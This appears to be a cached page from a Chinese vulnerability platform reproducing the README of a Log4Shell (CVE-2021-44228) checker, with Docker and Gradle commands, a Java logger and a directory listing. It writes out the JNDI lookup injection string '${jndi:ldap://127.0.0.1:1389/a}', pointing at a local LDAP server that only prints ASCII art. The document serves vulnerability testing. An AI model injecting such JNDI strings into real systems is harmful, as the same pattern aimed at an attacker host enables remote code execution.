漏洞平台

POC详情： 9ec4ed20567c356d0379468b0bfdeed93cfa0f68

来源

https://github.com/greymd/CVE-2021-44228

关联漏洞

标题： Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述：Apache Log4j是美国阿帕奇（Apache）基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞，攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器，当该请求被打印成日志时就会触发远程代码执行。

描述

Vulnerability CVE-2021-44228 checker

介绍

# CVE-2021-44228 checker

This is the repository for checking for vulnerability [CVE-2021-44228](https://access.redhat.com/security/cve/cve-2021-44228).

**This is a PoC that only displays strings without any external class loading. It cannot be used for arbitrary code execution.**

## How it works?

### Step 1: Run the server application

The image `ghcr.io/greymd/cve-2021-44228/server` is available and can be run on Docker.

```
$ docker run -p 1389:1389 -t ghcr.io/greymd/cve-2021-44228/server
```

### Step 2: Access the endpoint with log4j

Prepare the code to output logs using log4j and run it on the same host.
Make output string `${jndi:ldap://127.0.0.1:1389/a}`.

```java
package logger;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class App {
    private static final Logger logger = LogManager.getLogger(App.class);
    public static void main(String[] args) {
        logger.error("${jndi:ldap://127.0.0.1:1389/a}");
    }
}
```

If the argument is one that causes a vulnerability, the phrase 「うんこもりもり」(which means like "Lots of shit.") will be logged successfully.

```
17:52:24.871 [main] ERROR logger.App -
    "mm
    mmmm          "m           "mmmmm
  ""    #         m"               "
        #        m#m          m
       #        m"  #   m     "m     m
     m"        m"   "mm"        """""
   m            m   m          m            m   m
  mm#            # # "m       mm#            # # "m
   m"#"          ##   #        m"#"          ##   #
 ""#mm "m        #    #      ""#mm "m        #    #
   #    #            #         #    #            #
    "mm"           m"           "mm"           m"
```

If you are lazy to write and build your code, you can use a simple logger application in this repository.
The first argument will be output by the Logger.

```
$ git clone https://github.com/greymd/CVE-2021-44228.git
$ cd CVE-2021-44228/logger
$ ./gradlew run --args='Hello'
︙
> Task :run
22:10:02.307 [main] ERROR logger.App - Hello
```

An example of giving an argument that causes a vulnerability would be as follows.

```
$ ./gradlew run --args='${jndi:ldap://127.0.0.1:1389/a}'
︙
> Task :run
22:10:34.757 [main] ERROR logger.App -
    "mm
    mmmm          "m           "mmmmm
  ""    #         m"               "
        #        m#m          m
       #        m"  #   m     "m     m
     m"        m"   "mm"        """""
   m            m   m          m            m   m
  mm#            # # "m       mm#            # # "m
   m"#"          ##   #        m"#"          ##   #
 ""#mm "m        #    #      ""#mm "m        #    #
   #    #            #         #    #            #
    "mm"           m"           "mm"           m"
```

If you have a version of log4j that is NOT affected by the vulnerability, **or the server application is not running**, the string will be output as is without any modification. You can verify this by updating the version of the logger application as shown below.

```
$ sed -i.bak s/2.14.1/2.15.0/ build.gradle
$ ./gradlew run --args='${jndi:ldap://127.0.0.1:1389/a}'

> Task :run
22:12:50.913 [main] ERROR logger.App - ${jndi:ldap://127.0.0.1:1389/a}
```

### Run the server application without Docker

```
$ git clone https://github.com/greymd/CVE-2021-44228.git
$ cd CVE-2021-44228/server
$ ./gradlew run
︙
Listening ...
```

## Motivation
As I mentioned (and as far as I investigate), this vulnerability will not be reproduced unless the destination server of JNDI is running. Therefore, a simple PoC is useful.

## References

The following URLs were used for reference in the implementation.

* https://www.lunasec.io/docs/blog/log4j-zero-day/
* https://github.com/mbechler/marshalsec
* https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
* https://github.com/apache/logging-log4j2/pull/608
* https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept

## Tested versions

* `OpenJDK Runtime Environment (build 1.8.0_302-b08)`
* `OpenJDK Runtime Environment Corretto-11.0.12.7.1 (build 11.0.12+7-LTS)`
* `OpenJDK Runtime Environment Zulu17.30+15-CA (build 17.0.1+12-LTS)`

文件快照


 [4.0K]  /data/pocs/9ec4ed20567c356d0379468b0bfdeed93cfa0f68
├── [4.0K]  logger
│   ├── [ 396]  build.gradle
│   ├── [4.0K]  gradle
│   │   └── [4.0K]  wrapper
│   │       ├── [ 58K]  gradle-wrapper.jar
│   │       └── [ 202]  gradle-wrapper.properties
│   ├── [7.9K]  gradlew
│   ├── [2.6K]  gradlew.bat
│   ├── [ 355]  settings.gradle
│   └── [4.0K]  src
│       └── [4.0K]  main
│           └── [4.0K]  java
│               └── [4.0K]  logger
│                   └── [ 329]  App.java
├── [4.0K]  README.md
└── [4.0K]  server
    ├── [ 246]  build.gradle
    ├── [ 501]  deploy.sh
    ├── [ 321]  Dockerfile
    ├── [4.0K]  gradle
    │   └── [4.0K]  wrapper
    │       ├── [ 58K]  gradle-wrapper.jar
    │       └── [ 202]  gradle-wrapper.properties
    ├── [7.9K]  gradlew
    ├── [2.6K]  gradlew.bat
    ├── [  94]  Makefile
    ├── [ 355]  settings.gradle
    └── [4.0K]  src
        └── [4.0K]  main
            └── [4.0K]  java
                └── [4.0K]  server
                    └── [3.8K]  App.java

14 directories, 18 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。